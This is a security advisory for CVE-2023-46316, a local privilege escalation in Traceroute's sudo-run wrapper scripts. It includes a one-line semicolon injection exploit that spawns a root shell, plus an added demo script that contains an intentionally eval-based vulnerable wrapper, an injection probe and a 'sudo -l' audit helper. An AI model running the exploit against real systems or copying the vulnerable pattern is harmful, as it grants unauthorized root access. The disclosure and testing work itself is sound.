Authored by g30ff1rl

In Traceroute versions 2.0.12 through to 2.1.2, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts include tcptraceroute, tracepath, traceproto, and traceroute-nanog. Version 2.1.3 addresses this issue.

advisories | CVE-2023-46316

Description:
In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.

Additional information:
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)
A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command.

The scripts require raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts, rather than setting the "cap_net_raw" capability on the traceroute binary or having it use "icmp dgram" sockets. Any local user who has been granted such sudo rights can therefore escalate to root; that sudo entry for a vulnerable wrapper script is the only Attack Requirement (AT in CVSS 4.0).

The vulnerable wrapper scripts have shipped with the package since version 2.0.12. Distributions such as Debian 12, Fedora 38, CentOS 8 and Amazon Linux 2 include these wrapper scripts in their default traceroute packages.

Exploitation:
sudo tcptraceroute localhost ";bash"

The semicolon inside the host argument terminates the traceroute command built by the wrapper, and the text after it (bash) is executed as a second command in the root context sudo provided.
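The bug class described above, as an added example that is not the traceroute project's own wrapper code (the real scripts' text is not reproduced here): a minimal wrapper that rebuilds its argument list into a string and hands it back to the shell with eval, beside one that forwards "$@" unchanged, plus a helper that scans `sudo -l` output for the four affected wrapper names. The stub `fake_traceroute`, both wrapper functions, the `injects` probe and the sample `sudo -l` text are all constructed for the demo and assume nothing about the installed package.

```shell
#!/bin/sh
# Added illustration of CVE-2023-46316's bug class. NOT the traceroute
# project's wrapper; "traceroute" is replaced by a stub so this runs without
# raw-socket access or sudo.

# Stand-in for the real binary: prints each argument it received on its own line.
fake_traceroute() {
    printf '%s\n' "$@"
}

# Vulnerable pattern (hypothetical): arguments are glued into one string and
# re-parsed by the shell via eval, so ';', '|', '$(...)' in ANY parameter
# become shell syntax. Under "sudo wrapper ...", the injected command is root's.
vuln_wrapper() {
    opts=""
    for arg in "$@"; do
        opts="$opts $arg"
    done
    eval fake_traceroute -T $opts
}

# Hardened pattern: no eval; "$@" keeps each argument as exactly one word, so a
# host argument of ';bash' reaches traceroute as a literal (bogus) host name.
safe_wrapper() {
    fake_traceroute -T "$@"
}

# Probe: run the given wrapper with a host argument carrying ';<command>' and
# return 0 if that second command actually executed (it drops a marker file).
injects() {
    wrapper="$1"
    marker=$(mktemp)
    rm -f "$marker"
    # Same shape as the advisory's payload, with 'touch' in place of 'bash'.
    "$wrapper" localhost ";touch $marker" >/dev/null 2>&1
    if [ -e "$marker" ]; then
        rm -f "$marker"
        return 0
    fi
    return 1
}

# Audit helper: given the text of `sudo -l`, list which of the four affected
# wrappers the user may run as root (space separated, sorted, deduplicated).
affected_wrappers_in() {
    printf '%s\n' "$1" \
        | grep -oE '(tcptraceroute|tracepath|traceproto|traceroute-nanog)' \
        | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# Constructed sample of `sudo -l` output, not taken from a real host.
SAMPLE_SUDO_L='User alice may run the following commands on host:
    (root) NOPASSWD: /usr/bin/tcptraceroute, /usr/sbin/tracepath'

# Demo run.
if injects vuln_wrapper; then
    echo "eval-based wrapper: injected command executed"
fi
if injects safe_wrapper; then
    echo "quoted wrapper: injected command executed"
else
    echo "quoted wrapper: argument passed through literally"
fi
echo "affected wrappers in sample sudo -l: $(affected_wrappers_in "$SAMPLE_SUDO_L")"
```

On a real host, compare `sudo -l` against the four names and the installed traceroute version (2.1.3 or later has the fix); if a wrapper is listed, the sudoers entry itself is the exposure, regardless of what other arguments the rule allows.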